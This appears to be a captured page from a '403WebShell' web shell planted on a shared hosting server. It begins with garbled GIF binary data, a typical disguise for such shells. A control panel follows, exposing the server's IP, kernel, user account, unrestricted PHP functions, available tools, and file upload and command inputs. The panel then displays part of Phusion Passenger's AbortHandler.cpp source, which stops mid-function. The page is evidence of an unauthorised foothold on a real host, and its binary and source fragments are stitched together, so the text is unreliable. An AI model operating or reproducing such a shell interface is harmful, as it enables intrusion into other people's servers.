GIF89a=( õ' 7IAXKgNgYvYx\%wh…hŽth%ˆs%—x¨}9®Œ©€&©‰%¶†(¹–.¹5·œD¹&Çš)ÇŸ5ǘ;Í£*È¡&Õ²)ׯ7×µ<Ñ»4ï°3ø‘HÖ§KͯT÷¨Yÿšqÿ»qÿÔFØ !ù ' !ÿ NETSCAPE2.0 , =( þÀ“pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§gª«ªE¯°¨¬ª±²Œ¹º¹E¾­”´ÂB¶¯ §Åȸ»ÑD¾¿Á•ÄÅ®° ÝH¾ÒLÀÆDÙ«D¶BÝïðÀ¾DÑÑÔTÌÍíH òGö¨A RÎڐ |¥ ٭&ºìE8œ¹kGÔAÞpx­a¶­ã R2XB®åE8I€Õ6Xî:vT)äžþÀq¦è³¥ì仕F~%xñ  4#ZÔ‰O|-4Bs‘X:= QÉ œš lºÒyXJŠGȦ|s hÏíK–3l7·B|¥$'7Jީܪ‰‡àá”Dæn=Pƒ ¤Òëí‰`䌨ljóá¯Éüv>á–Á¼5 ½.69ûϸd«­ºÀûnlv©‹ªîf{¬ÜãPbŸ  l5‘ޝpß ´ ˜3aÅùäI«O’ý·‘áÞ‡˜¾Æ‚ÙÏiÇÿ‹Àƒ #öó)pâš Þ½ ‘Ý{ó)vmÞü%D~ 6f s}ŃƒDØW Eþ`‡þ À…L8xá†ç˜{)x`X/> Ì}mø‚–RØ‘*|`D=‚Ø_ ^ð5 !_…'aä“OÚ—7âcð`D”Cx`ÝÂ¥ä‹éY¹—F¼¤¥Š?¡Õ™ n@`} lď’ÄÉ@4>ñd œ à‘vÒxNÃ×™@žd=ˆgsžG±æ ´²æud &p8Qñ)ˆ«lXD©øÜéAžHìySun jª×k*D¤LH] †¦§C™Jä–´Xb~ʪwStŽ6K,°£qÁœ:9ت:¨þªl¨@¡`‚ûÚ ».Û¬¯t‹ÆSÉ[:°=Š‹„‘Nåû”Ìî{¿ÂA ‡Rà›ÀÙ6úë°Ÿð0Ä_ ½;ÃϱîÉì^ÇÛÇ#Ëë¼ôº!±Ä˜íUîÅÇ;0L1óÁµö«p% AÀºU̬ݵ¼á%霼€‡¯Á~`ÏG¯»À× ­²± =4ªnpð3¾¤³¯­ü¾¦îuÙuµÙ®|%2ÊIÿür¦#0·ÔJ``8È@S@5ê¢ ö×Þ^`8EÜ]ý.뜃Âç 7 ú ȉÞj œ½Dç zý¸iþœÑÙûÄë!ˆÞÀl§Ïw‹*DçI€nEX¯¬¼ &A¬Go¼QföõFç°¯;é¦÷îŽêJ°îúôF5¡ÌQ|îúöXªæ»TÁÏyñêï]ê² o óÎC=öõ›ÒÓPB@ D×½œä(>èCÂxŽ`±«Ÿ–JЀ»Û á¤±p+eE0`ëŽ`A Ú/NE€Ø†À9‚@¤à H½7”à‡%B‰`Àl*ƒó‘–‡8 2ñ%¸ —€:Ù1Á‰E¸àux%nP1ð!‘ðC)¾P81lÑɸF#ˆ€{´âé°ÈB„0>±û °b¡Š´±O‚3È–Ù()yRpbµ¨E.Z‘D8ÊH@% òŒx+%Ù˜Æcü »¸˜fõ¬b·d`Fê™8èXH"ÉÈ-±|1Ô6iI, 2““¬$+](A*jÐ QTÂo‰.ÛU슬Œã„Ž`¯SN¡–¶Äåyše¯ª’­¬‚´b¦Éož œ)åyâ@Ì®3 ÎtT̉°&Ø+žLÀf"Ø-|žçÔ>‡Ðv¦Ðžì\‚ Q1)Ž@Žh#aP72”ˆ™¨$‚ !ù " , =( …7IAXG]KgNgYvYxR"k\%w]'}hŽth%ˆg+ˆs%—r.—m3šx3˜x¨}9®€&©€+¨‡7§‰%¶†(¹–.¹œD¹&ǘ;Í•&ײ)×»4ïÌ6ò§KÍ þ@‘pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g «¬ E ±± ¨­¶°ººE Á´”·®C¬²§Ç¶Œ»ÓDÃÕƷ¯Ê±H½ºM×ÁGÚ¬D¶BËÁ½î½DÓôTÏÛßîG»ôõC×CÌ l&âž:'òtU³6ɹ#·Ø)€'Ü.6±&ëÍÈ» K(8p0N?!æ2"ÛˆNIJX>R¼ÐO‚M '¡¨2¸*Ÿþ>#n↠å@‚<[:¡Iïf’ ¤TÚ˘CdbÜÙ“[«ŽEú5MBo¤×@€`@„€Êt W-3 ¶Ÿ¡BíêäjIÝ…Eò9[T…$íêﯧ„…•s»Óȳ¹€ÅÚdc®UUρ#±Ùïldj?´í¼²`\ŽÁðÞu|3'ÖŒ]ë6 ¶S#²‡˜FKLÈ *N E´‘áäŠ$˜›eÄYD„ºq«.è촁ƒs \-ÔjA 9²õ÷å- üúM[Âx(ís÷ì®x€|í¡Ù’p¦‚ ŽkÛTÇDpE@WÜ ²Ç]kŠ1¨ þ€·Yb ÓÁ‰l°*n0 ç™—žzBdОu¾7ĉBl€â‰-ºx~|UåU‰  h*Hœ|e"#"?vpÄiŠe6^ˆ„+qâŠm8 #VÇá ‘å–ÄV„œ|Аè•m"сœn|@›U¶ÆÎž—Špb¥G¨ED”€±Úê2FÌIç? >Éxå Œ± ¡¤„%‘žjŸ‘ꄯ<Ìaà9ijÐ2˜D¦È&›†Z`‚å]wþ¼Â:ç6àB¤7eFJ|õÒ§Õ,¨äàFÇ®cS·Ê¶+B°,‘Þ˜ºNûãØ>PADÌHD¹æž«ÄÀnÌ¥}­#Ë’ë QÀÉSÌÂÇ2ÌXÀ{æk²lQÁ2«ÊðÀ¯w|2Í h‹ÄÂG€,m¾¶ë3ÐÙ6-´ÅE¬L°ÆIij*K½ÀÇqï`DwVÍQXœÚÔpeœ±¬Ñ q˜§Tœ½µƒ°Œìu Â<¶aØ*At¯lmEØ ü ôÛN[P1ÔÛ¦­±$ÜÆ@`ùåDpy¶yXvCAyåB`ŽD¶ 0QwG#¯ æš[^Äþ $ÀÓÝǦ{„L™[±úKÄgÌ;ï£S~¹ìGX.ôgoT.»åˆ°ùŸûù¡?1zö¦Ÿž:ÅgÁ|ìL¹ „®£œŠ‚à0œ]PÁ^p F<"•ç?!,ñ‡N4—…PÄ Á„ö¨Û:Tè@hÀ‹%táÿ:ø-žI<`þ‹p I….)^ 40D#p@ƒj4–؀:²‰1Øâr˜¼F2oW¼#Z†;$Q q” ‘ ÂK¦ñNl#29 !’F@¥Bh·ᏀL!—XFóLH‘Kh¤.«hE&JòG¨¥<™WN!€ÑÙÚˆY„@†>Œž19J" 2,/ &.GXB%ÌRÈ9B6¹W]’î×ÔW¥’IÎ$ ñ‹ÓŒE8YÆ ¼³™ñA5“à®Q.aŸB€&Ø©³ JÁ—! ¦t)K%tœ-¦JF bòNMxLôþ)ÐR¸Ð™‘ èÝ6‘O!THÌ„HÛ ‰ !ù ) , =( …AXKgNgYvYxR"k\%wh…hŽh%ˆg+ˆs%—r.—x3˜x¨}9®€&©€+¨Œ,©‡7§‰%¶†(¹–.¹5·&Çš)ǘ;Í•&×£*Ȳ)ׯ7×»4ï°3øÌ6ò‘HÖ§KÍ»Hó¯T÷¨Yÿ»qÿÇhÿ þÀ”pH,È¤rÉl:ŸÐ¨tJ­Z¯Ø¬vËíz¿à°xL.›Ïè´zÍn»ßð¸|N¯Ûïø¼~Ïïûÿ€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§g ª« E$±²¨ª­ · °²½$E$ÂÕ««D· Í ¿¦Ç¶¸ÌŒ¾³CÃÅÆ E ééH½MÛÂGâªD­ çBêêϾD²ÒaÀà€Š1r­ðÓ¤ ÔožzU!L˜C'¾yW½UGtäÇïÙllê0×àÂuGþ)AÀs[þ·xì ÁxO%ƒûX2ó—  P£n›R/¡ÑšHše+êDm?# —‘Ç£6¡8íJ¡ŸâDiäªM¥Ö„ôj“¬¹£5oQ7°- <‡ *´lãÓŒ2r/a!l)dÈ A™ÈE¢ôÔ͆…ð ;Ö˜c ¡%ß‚’Ùˆâ¸b½—pe~C"BíëÚHïeF2§æŠ8qb t_`urŠeü wÅu3êæPv§h•"ß`íÍxçLĹÜÖ3á  ~Öº“®›¸ÏMDfJÙ °„ÛµáWõ%§œ‚à©–‚X ÓØ)@®Ñ›Eþ´wëuÅSxb8y\mÖzœ¥§ZbºE—ÂLªÌw!y(>¡™wú=Ç|ÅÝs¢d €CÁW)HÜcC$€L Ä7„r.á\{)@ð` @ äXÈ$PD” `šaG:§æˆOˆ72EÐamn]ù"ŒcÊxÑŒ° &dR8`g«iÙŸLR!¦P …d’ä¡“¦ðÎTƒ¦ià|À _ ¥ Qi#¦Šg›Æ ›noMµ ›V ã£)p ç£ÎW…š=Âeªk§†j„ ´®1ß²sÉxéW«jšl|0¯B0Û, \jÛ´›6±¬¶C ÛíWþï|ëÙ‹¸ñzĸV {ì;Ýñn¼òVˆm³I¼³.Ðã¤PN¥ ²µ¼„µCã+¹ÍByî£Ñ¾HŸ›ëê 7ìYÆFTk¨SaoaY$Dµœìï¿Ã29RÈkt Çïfñ ÇÒ:ÀÐSp¹3ÇI¨â¥DZÄ ü9Ïýögñ½­uÔ*3)O‘˜Ö[_hv ,àî×Et Ÿé¶BH€ Õ[ü±64M@ÔSÌM7dÐl5-ÄÙU܍´©zߌ3Ô€3ž„ „ ¶ÛPô½5×g› êÚ˜kN„Ý…0Îj4€Ìë°“#{þÕ3S2çKÜ'ợlø¼Ú2K{° {Û¶?žm𸧠ËI¼nEò='êüóºè^üæÃ_Û=°óž‚ì#Oý¿Í'¡½áo..ÏYìnüñCœO±Áa¿¢Kô½o,üÄËbö²çºíï{ËC Ú— "”Ï{ËK ÍÒw„õ±Oz dÕ¨à:$ ƒô—«v»] A#ð «€¿šéz)Rx׿ˆ¥‚d``èw-îyÏf×K!ð€þ­Ð|ìPľ„=Ì`ý(f” 'Pa ¥ÐBJa%Ðâf§„%Š¡}FàáÝ×6>ÉäŠG"éŽè=ø!oа^FP¼Ø©Q„ÀCÙÁ`(Ž\ÄÝ® ©Â$<n@dÄ E#ììUÒI! ‚#lù‹`k¦ÐÇ'Rró’ZýNBÈMF Í[¤+‹ðɈ-áwj¨¥þ8¾rá ,VÂh„"|½œ=×G_¦Ñ™EØ 0i*%̲˜Æda0mV‚k¾)›;„&6 p>ÓjK “¦Ç# âDÂ:ûc?:R Ó¬fÞéI-Ì“•Ã<ä=™Ï7˜3œ¨˜c2ŒW ,ˆ”8(T™P‰F¡Jhç"‚ ; 403WebShell
403Webshell
Server IP : 104.21.83.152  /  Your IP : 216.73.216.66
Web Server : LiteSpeed
System : Linux premium229.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
User : akhalid ( 749)
PHP Version : 8.3.22
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/src/agent/Shared/Fundamentals/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cpanel/ea-ruby27/src/passenger-release-6.0.23/src/agent/Shared/Fundamentals/AbortHandler.cpp
/*
 *  Phusion Passenger - https://www.phusionpassenger.com/
 *  Copyright (c) 2010-2017 Phusion Holding B.V.
 *
 *  "Passenger", "Phusion Passenger" and "Union Station" are registered
 *  trademarks of Phusion Holding B.V.
 *
 *  Permission is hereby granted, free of charge, to any person obtaining a copy
 *  of this software and associated documentation files (the "Software"), to deal
 *  in the Software without restriction, including without limitation the rights
 *  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 *  copies of the Software, and to permit persons to whom the Software is
 *  furnished to do so, subject to the following conditions:
 *
 *  The above copyright notice and this permission notice shall be included in
 *  all copies or substantial portions of the Software.
 *
 *  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 *  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 *  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 *  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 *  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
 *  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
 *  THE SOFTWARE.
 */

#include <Shared/Fundamentals/AbortHandler.h>

#include <boost/cstdint.hpp>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <cstdio>
#include <cstdlib>
#include <cstddef>
#include <cstring>
#include <cerrno>
#include <cassert>
#include <fcntl.h>
#include <poll.h>
#include <unistd.h>
#include <signal.h>
#include <libgen.h>

#ifdef __linux__
	#include <sys/syscall.h>
	#include <features.h>
#endif
#if defined(__APPLE__) || defined(__GNU_LIBRARY__)
	#define LIBC_HAS_BACKTRACE_FUNC
#endif
#ifdef LIBC_HAS_BACKTRACE_FUNC
	#include <execinfo.h>
#endif

#include <Shared/Fundamentals/AbortHandler.h>
#include <Shared/Fundamentals/Utils.h>
#include <Constants.h>
#include <LoggingKit/LoggingKit.h>
#include <LoggingKit/Context.h>
#include <ResourceLocator.h>
#include <RandomGenerator.h>
#include <ProcessManagement/Utils.h>
#include <Utils.h>
#include <Utils/AsyncSignalSafeUtils.h>

namespace Passenger {
namespace Agent {
namespace Fundamentals {

using namespace std;
namespace ASSU = AsyncSignalSafeUtils;

#define RANDOM_TOKEN_SIZE 6
#define MAX_RANDOM_TOKENS 256


struct AbortHandlerContext {
	const AbortHandlerConfig *config;
	char *installSpec;
	char *rubyLibDir;
	char *tmpDir;
	char *crashWatchCommand;
	char *backtraceSanitizerCommand;
	bool backtraceSanitizerPassProgramInfo;

	/**
	 * A string of RANDOM_TOKEN_SIZE * MAX_RANDOM_SIZES bytes.
	 * Used by createCrashLogDir() to find a unique directory name.
	 */
	char *randomTokens;

	int emergencyPipe1[2];
	int emergencyPipe2[2];

	char *alternativeStack;

	volatile sig_atomic_t callCount;
};

struct AbortHandlerWorkingState {
	pid_t pid;
	int signo;
	siginfo_t *info;

	char messagePrefix[32];
	char messageBuf[1024];

	char crashLogDir[256];
	int crashLogDirFd;
};

typedef void (*Callback)(AbortHandlerWorkingState &state, void *userData);


#define IGNORE_SYSCALL_RESULT(code) \
	do { \
		int _ret = code; \
		(void) _ret; \
	} while (false)


static AbortHandlerContext *ctx = NULL;
static const char digits[] = "0123456789";
static const char hex_chars[] = "0123456789abcdef";


static void
write_nowarn(int fd, const void *buf, size_t n) {
	ASSU::writeNoWarn(fd, buf, n);
}

static void
printCrashLogFileCreated(AbortHandlerWorkingState &state, const char *fname) {
	const char *end = state.messageBuf + sizeof(state.messageBuf);
	char *pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, "Dumping to ");
	pos = ASSU::appendData(pos, end, state.crashLogDir);
	pos = ASSU::appendData(pos, end, "/");
	pos = ASSU::appendData(pos, end, fname);
	pos = ASSU::appendData(pos, end, "\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
}

static void
printCrashLogFileCreationError(AbortHandlerWorkingState &state, const char *fname, int e) {
	const char *end = state.messageBuf + sizeof(state.messageBuf);
	char *pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, "Error creating ");
	pos = ASSU::appendData(pos, end, state.crashLogDir);
	pos = ASSU::appendData(pos, end, "/");
	pos = ASSU::appendData(pos, end, fname);
	pos = ASSU::appendData(pos, end, ": ");
	pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
	pos = ASSU::appendData(pos, end, " (errno=");
	pos = ASSU::appendInteger<int, 10>(pos, end, e);
	pos = ASSU::appendData(pos, end, ")\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
}

static char *
appendSignalName(char *pos, const char *end, int signo) {
	switch (signo) {
	case SIGABRT:
		pos = ASSU::appendData(pos, end, "SIGABRT");
		break;
	case SIGSEGV:
		pos = ASSU::appendData(pos, end, "SIGSEGV");
		break;
	case SIGBUS:
		pos = ASSU::appendData(pos, end, "SIGBUS");
		break;
	case SIGFPE:
		pos = ASSU::appendData(pos, end, "SIGFPE");
		break;
	case SIGILL:
		pos = ASSU::appendData(pos, end, "SIGILL");
		break;
	default:
		return ASSU::appendInteger<int, 10>(pos, end, signo);
	}
	pos = ASSU::appendData(pos, end, "(");
	pos = ASSU::appendInteger<int, 10>(pos, end, signo);
	pos = ASSU::appendData(pos, end, ")");
	return pos;
}

#define SI_CODE_HANDLER(name) \
	case name: \
		buf = ASSU::appendData(buf, end, #name); \
		break

// Must be async signal safe.
static char *
appendSignalReason(char *buf, const char *end, siginfo_t *info) {
	bool handled = true;

	switch (info->si_code) {
	SI_CODE_HANDLER(SI_USER);
	#ifdef SI_KERNEL
		SI_CODE_HANDLER(SI_KERNEL);
	#endif
	SI_CODE_HANDLER(SI_QUEUE);
	SI_CODE_HANDLER(SI_TIMER);
	#ifdef SI_ASYNCIO
		SI_CODE_HANDLER(SI_ASYNCIO);
	#endif
	#ifdef SI_MESGQ
		SI_CODE_HANDLER(SI_MESGQ);
	#endif
	#ifdef SI_SIGIO
		SI_CODE_HANDLER(SI_SIGIO);
	#endif
	#ifdef SI_TKILL
		SI_CODE_HANDLER(SI_TKILL);
	#endif
	default:
		switch (info->si_signo) {
		case SIGSEGV:
			switch (info->si_code) {
			#ifdef SEGV_MAPERR
				SI_CODE_HANDLER(SEGV_MAPERR);
			#endif
			#ifdef SEGV_ACCERR
				SI_CODE_HANDLER(SEGV_ACCERR);
			#endif
			default:
				handled = false;
				break;
			}
			break;
		case SIGBUS:
			switch (info->si_code) {
			#ifdef BUS_ADRALN
				SI_CODE_HANDLER(BUS_ADRALN);
			#endif
			#ifdef BUS_ADRERR
				SI_CODE_HANDLER(BUS_ADRERR);
			#endif
			#ifdef BUS_OBJERR
				SI_CODE_HANDLER(BUS_OBJERR);
			#endif
			default:
				handled = false;
				break;
			}
			break;
		default:
			handled = false;
			break;
		}
		if (!handled) {
			buf = ASSU::appendData(buf, end, "#");
			buf = ASSU::appendInteger<int, 10>(buf, end, info->si_code);
		}
		break;
	}

	if (info->si_code <= 0) {
		buf = ASSU::appendData(buf, end, ", signal sent by PID ");
		buf = ASSU::appendInteger<pid_t, 10>(buf, end, info->si_pid);
		buf = ASSU::appendData(buf, end, " with UID ");
		buf = ASSU::appendInteger<uid_t, 10>(buf, end, info->si_uid);
	}

	buf = ASSU::appendData(buf, end, ", si_addr=0x");
	buf = ASSU::appendInteger<boost::uintptr_t, 16>(buf, end, (boost::uintptr_t) info->si_addr);

	return buf;
}

static int
runInSubprocessWithTimeLimit(AbortHandlerWorkingState &state, Callback callback, void *userData, int timeLimit) {
	char *pos;
	const char *end = state.messageBuf + sizeof(state.messageBuf);
	pid_t child;
	int p[2], e;

	if (pipe(p) == -1) {
		e = errno;
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "Could not create subprocess: pipe() failed: ");
		pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
		pos = ASSU::appendData(pos, end, " (errno=");
		pos = ASSU::appendInteger<int, 10>(pos, end, e);
		pos = ASSU::appendData(pos, end, ")\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		return -1;
	}

	child = asyncFork();
	if (child == 0) {
		close(p[0]);
		callback(state, userData);
		_exit(0);
		return -1;

	} else if (child == -1) {
		e = errno;
		close(p[0]);
		close(p[1]);
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "Could not create subprocess: fork() failed: ");
		pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
		pos = ASSU::appendData(pos, end, " (errno=");
		pos = ASSU::appendInteger<int, 10>(pos, end, e);
		pos = ASSU::appendData(pos, end, ")\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
		return -1;

	} else {
		int status;
		close(p[1]);

		// We give the child process a time limit. If it doesn't succeed in
		// exiting within the time limit, we assume that it has frozen
		// and we kill it.
		struct pollfd fd;
		fd.fd = p[0];
		fd.events = POLLIN | POLLHUP | POLLERR;
		if (poll(&fd, 1, timeLimit) <= 0) {
			kill(child, SIGKILL);
			ASSU::printError("Could not run child process: it did not exit in time\n");
		}
		close(p[0]);
		if (waitpid(child, &status, 0) == child) {
			return status;
		} else {
			return -1;
		}
	}
}

static void
dumpUlimits(AbortHandlerWorkingState &state) {
	const char *end = state.messageBuf + sizeof(state.messageBuf);
	char *pos = state.messageBuf;
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	pos = ASSU::appendData(pos, end, " ] Dumping ulimits...\n");
	write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	int fd = -1;
	if (state.crashLogDirFd != -1) {
		fd = openat(state.crashLogDirFd, "ulimits.log", O_WRONLY | O_CREAT | O_TRUNC, 0600);
		if (fd != -1) {
			printCrashLogFileCreated(state, "ulimits.log");
		} else {
			printCrashLogFileCreationError(state, "ulimits.log", errno);
		}
	}

	pid_t pid = asyncFork();
	int status;
	if (pid == 0) {
		if (fd != -1) {
			dup2(fd, STDOUT_FILENO);
			dup2(fd, STDERR_FILENO);
		}
		closeAllFileDescriptors(2, true);
		execlp("ulimit", "ulimit", "-a", (char *) 0);
		// On Linux 'ulimit' is a shell builtin, not a command.
		execlp("/bin/sh", "/bin/sh", "-c", "ulimit -a", (char *) 0);
		_exit(1);
	} else if (pid == -1) {
		ASSU::printError("ERROR: Could not fork a process to dump the ulimit!\n");
	} else if (waitpid(pid, &status, 0) != pid || status != 0) {
		ASSU::printError("ERROR: Could not run 'ulimit -a'!\n");
	}

	if (fd != -1) {
		close(fd);
	}
}

static void
dumpFileDescriptorInfoWithLsof(AbortHandlerWorkingState &state, void *userData) {
	if (state.crashLogDirFd != -1) {
		int fd = openat(state.crashLogDirFd, "fds.log", O_WRONLY | O_CREAT | O_TRUNC, 0600);
		if (fd != -1) {
			printCrashLogFileCreated(state, "fds.log");
			dup2(fd, STDOUT_FILENO);
			dup2(fd, STDERR_FILENO);
			close(fd);
		} else {
			printCrashLogFileCreationError(state, "fds.log", errno);
		}
	}

	char *pos = state.messageBuf;
	const char *end = state.messageBuf + sizeof(state.messageBuf) - 1;
	pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
	*pos = '\0';

	closeAllFileDescriptors(2, true);

	execlp("lsof", "lsof", "-p", state.messageBuf, "-nP", (char *) 0);

	const char *command[] = { "lsof", NULL };
	printExecError2(command, errno, state.messageBuf, sizeof(state.messageBuf));
	_exit(1);
}

static void
dumpFileDescriptorInfoWithLs(AbortHandlerWorkingState &state, const char *path) {
	pid_t pid;
	int fd = -1;
	int status;

	if (state.crashLogDirFd != -1) {
		fd = openat(state.crashLogDirFd, "fds.log", O_WRONLY | O_CREAT | O_TRUNC, 0600);
		if (fd != -1) {
			printCrashLogFileCreated(state, "fds.log");
		} else {
			printCrashLogFileCreationError(state, "fds.log", errno);
		}
	}

	pid = asyncFork();
	if (pid == 0) {
		if (fd != -1) {
			dup2(fd, STDOUT_FILENO);
			dup2(fd, STDERR_FILENO);
		}

		const char *end = state.messageBuf + sizeof(state.messageBuf);
		char *pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "Running: ls -lv ");
		pos = ASSU::appendData(pos, end, path);
		pos = ASSU::appendData(pos, end, "\n");
		pos = ASSU::appendData(pos, end, "--------------------------\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

		closeAllFileDescriptors(2, true);
		// The '-v' is for natural sorting on Linux. On BSD -v means something else but it's harmless.
		execlp("ls", "ls", "-lv", path, (char *) 0);

		const char *command[] = { "ls", NULL };
		printExecError2(command, errno, state.messageBuf, sizeof(state.messageBuf));
		_exit(1);
	} else if (pid == -1) {
		ASSU::printError("ERROR: Could not fork a process to dump file descriptor information!\n");
	} else if (waitpid(pid, &status, 0) != pid || status != 0) {
		ASSU::printError("ERROR: Could not run 'ls' to dump file descriptor information!\n");
	}

	if (fd != -1) {
		close(fd);
	}
}

static void
dumpFileDescriptorInfo(AbortHandlerWorkingState &state) {
	char *messageBuf = state.messageBuf;
	char *pos;
	const char *end = state.messageBuf + sizeof(state.messageBuf) - 1;
	struct stat buf;
	int status;

	pos = messageBuf;
	pos = ASSU::appendData(pos, end, state.messagePrefix);
	pos = ASSU::appendData(pos, end, " ] Open files and file descriptors:\n");
	write_nowarn(STDERR_FILENO, messageBuf, pos - messageBuf);

	status = runInSubprocessWithTimeLimit(state, dumpFileDescriptorInfoWithLsof, NULL, 4000);

	if (status != 0) {
		char path[256];
		ASSU::printError("Falling back to another mechanism for dumping file descriptors.\n");

		pos = path;
		end = path + sizeof(path) - 1;
		pos = ASSU::appendData(pos, end, "/proc/");
		pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
		pos = ASSU::appendData(pos, end, "/fd");
		*pos = '\0';
		if (stat(path, &buf) == 0) {
			dumpFileDescriptorInfoWithLs(state, path);
			return;
		}

		pos = path;
		pos = ASSU::appendData(pos, end, "/dev/fd");
		*pos = '\0';
		if (stat(path, &buf) == 0) {
			dumpFileDescriptorInfoWithLs(state, path);
			return;
		}

		pos = messageBuf;
		pos = ASSU::appendData(pos, end, "ERROR: No other file descriptor dumping mechanism on current platform detected.\n");
		write_nowarn(STDERR_FILENO, messageBuf, pos - messageBuf);
	}
}

static void
dumpWithCrashWatch(AbortHandlerWorkingState &state) {
	int fd = -1;

	if (state.crashLogDirFd != -1) {
		fd = openat(state.crashLogDirFd, "backtrace.log", O_WRONLY | O_CREAT | O_TRUNC, 0600);
		if (fd != -1) {
			printCrashLogFileCreated(state, "backtrace.log");
		} else {
			printCrashLogFileCreationError(state, "backtrace.log", errno);
		}
	}

	char *pos = state.messageBuf;
	const char *end = state.messageBuf + sizeof(state.messageBuf) - 1;
	pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
	*pos = '\0';

	pid_t child = asyncFork();
	if (child == 0) {
		if (fd != -1) {
			dup2(fd, STDOUT_FILENO);
			dup2(fd, STDERR_FILENO);
		}
		closeAllFileDescriptors(2, true);
		execlp(ctx->config->ruby, ctx->config->ruby, ctx->crashWatchCommand,
			ctx->rubyLibDir, ctx->installSpec, "--dump",
			state.messageBuf, // PID string
			(char *) 0);

		const char *command[] = { "crash-watch", NULL };
		printExecError2(command, errno, state.messageBuf, sizeof(state.messageBuf));
		_exit(1);

	} else if (child == -1) {
		int e = errno;
		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "Could not execute crash-watch: fork() failed: ");
		pos = ASSU::appendData(pos, end, ASSU::limitedStrerror(e));
		pos = ASSU::appendData(pos, end, " (errno=");
		pos = ASSU::appendInteger<int, 10>(pos, end, e);
		pos = ASSU::appendData(pos, end, ")\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

	} else {
		waitpid(child, NULL, 0);
	}

	if (fd != -1) {
		close(fd);
	}
}

#ifdef LIBC_HAS_BACKTRACE_FUNC
	static void
	dumpBacktrace(AbortHandlerWorkingState &state, void *userData) {
		void *backtraceStore[512];
		int frames = backtrace(backtraceStore, sizeof(backtraceStore) / sizeof(void *));
		char *pos;
		const char *end = state.messageBuf + sizeof(state.messageBuf) - 1;

		pos = state.messageBuf;
		pos = ASSU::appendData(pos, end, "--------------------------------------\n");
		pos = ASSU::appendData(pos, end, "[ pid=");
		pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
		pos = ASSU::appendData(pos, end, " ] Backtrace with ");
		pos = ASSU::appendInteger<int, 10>(pos, end, frames);
		pos = ASSU::appendData(pos, end, " frames:\n");
		write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);

		if (ctx->backtraceSanitizerCommand != NULL) {
			int p[2];
			if (pipe(p) == -1) {
				int e = errno;
				pos = state.messageBuf;
				pos = ASSU::appendData(pos, end, "Could not dump diagnostics through backtrace sanitizer: pipe() failed with errno=");
				pos = ASSU::appendInteger<int, 10>(pos, end, e);
				pos = ASSU::appendData(pos, end, "\n");
				pos = ASSU::appendData(pos, end, "Falling back to writing to stderr directly...\n");
				write_nowarn(STDERR_FILENO, state.messageBuf, pos - state.messageBuf);
				backtrace_symbols_fd(backtraceStore, frames, STDERR_FILENO);
				return;
			}

			pid_t pid = asyncFork();
			if (pid == 0) {
				const char *pidStr = pos = state.messageBuf;
				pos = ASSU::appendInteger<pid_t, 10>(pos, end, state.pid);
				*pos = '\0';
				pos++;

				close(p[1]);
				dup2(p[0], STDIN_FILENO);
				closeAllFileDescriptors(2, true);

				const char *command = pos;
				pos = ASSU::appendData(pos, end, "exec ");
				pos = ASSU::appendData(pos, end, ctx->backtraceSanitizerCommand);
				if (ctx->backtraceSanitizerPassProgramInfo) {
					pos = ASSU::appendData(pos, end, " \"");
					pos = ASSU::appendData(pos, end, ctx->config->origArgv[0]);
					pos = ASSU::appendData(pos, end, "\" ");
					pos = ASSU::appendData(pos, end, pidStr);
				}
				*pos = '\0';
				pos++;
				execlp("/bin/sh", "/bin/sh", "-c", command, (char *) 0);

				pos = state.messageBuf;
				pos = ASSU::appendData(pos, end, "ERROR: cannot execute '");
